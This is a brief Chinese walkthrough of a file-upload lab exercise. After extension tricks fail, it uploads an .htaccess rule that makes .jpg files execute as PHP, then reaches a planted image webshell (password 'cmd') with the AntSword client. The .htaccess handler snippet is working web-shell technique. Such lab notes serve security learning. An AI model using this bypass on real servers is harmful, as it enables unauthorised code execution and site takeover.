本练习最终只能上传图片,关键要让图片文件可以调用,也就是作为php解析。
一、通过之前的方法均不能上传php文件
通过burpsuite配合改扩展名、大小写、双写等手段均不上传成功。
二、编写并上传.htaccess文件上传,将图片作为php解析
编写.htaccess文件并上传,作用是将之后上传的同文件夹下的jpg文件作为php文件解析执行
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
三、再直接上传之前同样图片文件,不改扩展名
图片文件内容为:
四、测试连接
用中国蚁剑软件测试连接,url地址中的地址直接指向jpg文件,即up/5.jpg,密码为cmd,经测试连接成功。